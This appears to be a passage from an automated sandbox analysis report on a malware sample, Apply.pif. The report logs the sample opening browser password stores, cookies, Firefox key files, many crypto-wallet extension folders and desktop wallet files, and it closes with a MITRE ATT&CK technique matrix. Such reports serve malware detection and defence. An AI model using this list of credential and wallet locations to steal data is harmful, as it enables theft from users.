            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: Apply.pifBinary or memory string: WIN_81
            Source: Apply.pifBinary or memory string: WIN_XP
            Source: Apply.pifBinary or memory string: WIN_XPe
            Source: Apply.pifBinary or memory string: WIN_VISTA
            Source: Apply.pif.10.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Apply.pifBinary or memory string: WIN_7
            Source: Apply.pifBinary or memory string: WIN_8
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: Apply.pif PID: 6488, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Apply.pif PID: 6488, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008D198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_008D198B
            Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pifCode function: 12_2_008D1F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_008D1F8D
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            2
            Valid Accounts
            1
            Windows Management Instrumentation
            1
            Scripting
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Deobfuscate/Decode Files or Information
            121
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol31
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            2
            Valid Accounts
            2
            Valid Accounts
            2
            Obfuscated Files or Information
            Security Account Manager23
            File and Directory Discovery
            SMB/Windows Admin Shares121
            Input Capture
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
            Access Token Manipulation
            1
            DLL Side-Loading
            NTDS37
            System Information Discovery
            Distributed Component Object Model3
            Clipboard Data
            113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
            Process Injection
            11
            Masquerading
            LSA Secrets221
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Valid Accounts
            Cached Domain Credentials21
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
